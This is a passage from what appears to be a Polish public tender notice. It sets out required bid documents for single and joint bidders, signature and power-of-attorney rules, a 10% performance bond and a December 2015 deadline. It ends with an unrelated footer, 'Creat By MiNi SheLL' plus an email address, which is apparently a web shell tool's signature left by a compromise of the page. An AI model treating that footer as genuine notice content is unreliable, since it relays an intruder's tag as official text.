5) oświadczenie o przynależności wraz z listą podmiotów należących do tej samej grupy kapitałowej lub braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50 poz. 331 z późn. zm.) (Załącznik nr C wg Spisu zawartości oferty) złożony w formie oryginału, wypełniony  odpowiednio lub z adnotacją - nie dotyczy-.
2. Oferta Wykonawców wspólnie ubiegających  się o udzielenie zamówienia 
1) wspólny formularz oferty wraz  z oświadczeniem o spełnieniu warunków udziału w postępowaniu (część A wg   Spisu zawartości oferty), złożony w formie oryginału,
2) oświadczenie o braku podstaw do wykluczenia (część B wg Spisu zawartości oferty), złożone w formie oryginału przez każdego z wykonawców wspólnie ubiegających się o zamówienie.
3) dokumenty potwierdzające spełnienie warunków udziału w postępowaniu wymienione w pkt 5.2 i 5.3 SIWZ (jeżeli dotyczy); Dokumenty muszą  być złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę, przy czym:
A) każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia składa dokumenty stanowiące Załączniki nr 1.1; B; wg Spisu zawartości oferty;
B) każdy z Wykonawców, który wykazuje spełnienie danego warunku w imieniu wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia składa odpowiednio dokumenty stanowiące Załączniki nr  3(1-n); 2, wg Spisu zawartości oferty;
C) każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia składa wypełnione odpowiednio lub z adnotacją -nie dotyczy- Załączniki nr  3; 4  wg Spisu zawartości oferty,
4) Zobowiązanie podmiotu udostępniającego Wykonawcy zasoby niezbędne do realizacji zamówienia (Załącznik nr 5 wg Spisu zawartości oferty) złożony w formie oryginału lub z adnotacją - nie dotyczy-,
5) oświadczenie o przynależności wraz z listą podmiotów należących do tej samej grupy kapitałowej lub braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50 poz. 331 z późn. zm.) (załącznik nr C wg Spisu zawartości oferty) złożony w formie oryginału lub z adnotacją -nie dotyczy-,

3. Oferta musi być podpisana przez osoby uprawnione do składania oświadczeń woli w imieniu Wykonawcy, tj. :
1) osoby uprawnione zgodnie z aktualnym odpisem z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej lub
2) osoby posiadające ważne pełnomocnictwo,  którego oryginał, lub kopię  poświadczoną notarialnie za zgodność z oryginałem, lub odpis albo wyciąg z dokumentu sporządzony przez notariusza -należy załączyć w ofercie :
a) w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcjum, spółka cywilna) - jako Załącznik nr 1.2
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których Wykonawca polega na zasadach określonych w art. 26 ust. 2b Pzp, kopie dokumentów dotyczących odpowiednio Wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez Wykonawcę lub te podmioty. 
b) w przypadku wykonawców, którzy ubiegają się samodzielnie o udzielenie zamówienia - jako Załącznik nr 1.3 
V. Przed zawarciem umowy Wykonawca zobowiązany jest do wniesienia zabezpieczenia należytego wykonania umowy na sumę stanowiącą 10% ceny całkowitej podanej w ofercie.
VI. Wykonawca zrealizuje przedmiot zamówienia w terminie do 70 dni od dnia podpisania umowy, jednak nie dłużej niż do 18. 12. 2015r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com